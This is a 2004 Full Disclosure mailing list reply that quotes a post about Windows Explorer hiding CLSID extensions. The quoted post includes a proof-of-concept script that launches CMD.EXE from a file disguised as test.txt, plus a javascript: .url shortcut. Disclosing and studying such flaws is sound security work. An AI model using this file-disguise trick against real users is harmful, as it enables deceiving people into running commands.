Full Disclosure mailing list archives
RE: Microsoft hides certain types of files from your eyes + some filename parsing bug
From: "Stuart Fox \(DSL AK\)" <StuartF () datacom co nz>
Date: Thu, 8 Jul 2004 16:58:22 +1200
The CLSID one doesn't work at all under XP SP2 Beta RC2. The CLSID is registered on my machine as an HTA. File extension is show regardless of whether you have view file extensions turned on or off. Cheers Stu ________________________________ From: full-disclosure-admin () lists netsys com [mailto:full-disclosure-admin () lists netsys com] On Behalf Of Good One Sent: Thursday, 8 July 2004 11:37 a.m. To: full-disclosure () lists netsys com Subject: [Full-disclosure] Microsoft hides certain types of files from your eyes + some filename parsing bug Microsoft HIDES certain types of files from your eyes: This one is old unpatched "behaviour" ... If you will create in windows explorer file : test.txt with content : <script> a=new ActiveXObject("WSCript.Shell"); a.run("CMD.EXE"); alert("Hello, I'm Silly Billy !"); </script> It will be executed if you will add CLSID to it's name and user double clicks it : test.txt.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B} Note: CLSID will remain hidden (explorer will not show it up in any means) File name for user will remain : test.txt This adds numerous possibilities for viruses to fool end user into safe content. another filename parsing bug (system even cannot access it) : By some technics windows still allows to write file on harddisk with funny name like : test [good one :] .avi End user will expierence certain difficulties to remove it afterwards from system. It's name will change to "test [good one", it will have no extension, will show up 0 bytes etc, etc... Of course .url and .lnk are hidden as well, being "shortcuts" in m$ way. The contents of those files are up to you ... :-) For example : file "test.url" with this content will open your browser with alert. [DEFAULT] BASEURL=javascript:alert('hello mama !') [InternetShortcut] URL=javascript:alert('hello mama !') Modified=00027F010505010100 m$ is good for gaming, not for serious work.. - SomeMan. ________________________________ ALL-NEW Yahoo! Messenger <http://uk.rd.yahoo.com/evt=21626/*http://uk.messenger.yahoo.com> - sooooo many all-new ways to express yourself
Current thread:
- Microsoft hides certain types of files from your eyes + some filename parsing bug Good One (Jul 07)
- RE: Microsoft hides certain types of files from your eyes + some filename parsing bug Jelmer (Jul 07)
- RE: Microsoft hides certain types of files from your eyes + some filename parsing bug Eric Paynter (Jul 07)
- Re: Microsoft hides certain types of files from your eyes + some filename parsing bug Darren Reed (Jul 08)
- <Possible follow-ups>
- RE: Microsoft hides certain types of files from your eyes + some filename parsing bug Stuart Fox (DSL AK) (Jul 07)
- RE: Microsoft hides certain types of files from your eyes + some filename parsing bug Jelmer (Jul 07)